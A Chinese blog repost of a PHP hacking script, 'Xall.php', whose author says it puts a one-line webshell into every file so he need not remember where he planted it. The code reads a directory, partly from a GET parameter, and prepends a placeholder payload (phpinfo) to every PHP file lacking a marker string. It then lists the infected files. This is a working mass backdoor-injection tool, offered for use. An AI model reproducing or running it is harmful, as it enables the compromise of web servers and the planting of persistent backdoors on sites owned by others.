首页 > 编程地带 > Xall.php-批量查询插入一句话

Xall.php-批量查询插入一句话

2008年1月17日 发表评论 阅读评论

作者:xy7[B.C.T]

总是忘记一句话放到哪个文件里去了,直接全部干掉…

<br /><?//xy7<br />if (!isset($dir) or empty($dir)) {<br />$dir=str_replace(&#039;&#92;&#92;&#039;,&#039;/&#039;,dirname(__FILE__));<br />echo "<font color=&#92;"#00688B&#92;">".$dir."</font>";<br />} else {<br />$dir=$_GET&#91;&#039;dir&#039;&#93;;<br />echo "<font color=&#92;"#00688B&#92;">".$dir."</font>";<br />}<br />$evilcode="<?phpinfo();//xy7?>";<br />$testdir = opendir($dir);<br />while($filea = @readdir($testdir)){<br />if(strstr($filea, &#039;.php&#039;)){<br />$fp = @fopen($filea, &#039;r+&#039;);<br />if (!strstr(@fread($fp, 20), &#039;xy7&#039;)){<br />rewind($fp);<br />$old = @fread($fp, filesize($filea));<br />rewind($fp);<br />fwrite($fp, $evilcode . $old);<br />}<br />fclose($fp);<br />}<br />}<br />closedir($testdir);<br />?><br /><hr><br /><table width="100%" border="0" cellpadding="3" cellspacing="1"><br /><tr><br /><td><b>被X的文件</b></td><br /><td><b>时间</b></td><br /><td><b>大小</b></td><br /></tr><br /><?php<br />$dirs=@opendir($dir);<br />while ($file=@readdir($dirs)) {<br />if ((is_file($file)) and (ereg("&#92;.php{0,1}$",$file)))<br />{$b="$dir/$file";<br />$a=@is_dir($b);<br />if($a=="0"){<br />$size=@filesize("$dir/$file");<br />$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));<br />echo "<tr>&#92;n";<br />echo "<td>$file</td>&#92;n";<br />echo " <td>$lastsave</td>&#92;n";<br />echo " <td>$size Bytes</td>&#92;n";<br />}<br />}<br />}<br />@closedir($dirs);<br />?><br /></table><br />codz by xuanmumu

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:Xall.php-批量查询插入一句话
本文地址:http://www.woyigui.cn/2008/01/17/xallphp%E6%89%B9%E9%87%8F%E6%9F%A5%E8%AF%A2%E6%8F%92%E5%85%A5%E4%B8%80%E5%8F%A5%E8%AF%9D/

分类: 编程地带 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*